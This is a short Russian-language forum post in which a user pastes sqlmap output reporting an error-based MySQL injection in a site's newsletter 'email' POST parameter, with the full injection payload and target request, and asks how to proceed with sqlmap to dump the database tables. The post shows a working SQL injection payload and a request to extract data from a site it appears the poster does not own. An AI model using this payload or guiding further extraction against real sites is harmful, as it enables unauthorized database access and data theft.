Показать сообщение отдельно

  #5  
Старый 05.03.2016, 04:15
demontager
Новичок
Регистрация: 23.07.2009
Сообщений: 25
С нами: 8843221

Репутация: 0
По умолчанию

После скана сайта на уязвимость, выдало такую инфу.

Код:
sqlmap identified the following injection point(s) with a total of 275 HTTP(s) requests:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: mailFlag=newsletter&email=QWln' AND (SELECT 5736 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(5736=5736,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Jdzw'='Jdzw
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
и в target.txt такое

Код:
https://www.site.com/index.php?option=sentMail (POST)

mailFlag=newsletter&email=QWln
Как дальше раскручивать чтобы получить таблицы ? Интересует сам запрос sqlmap.py -u "" и что указывать.
 
Ответить с цитированием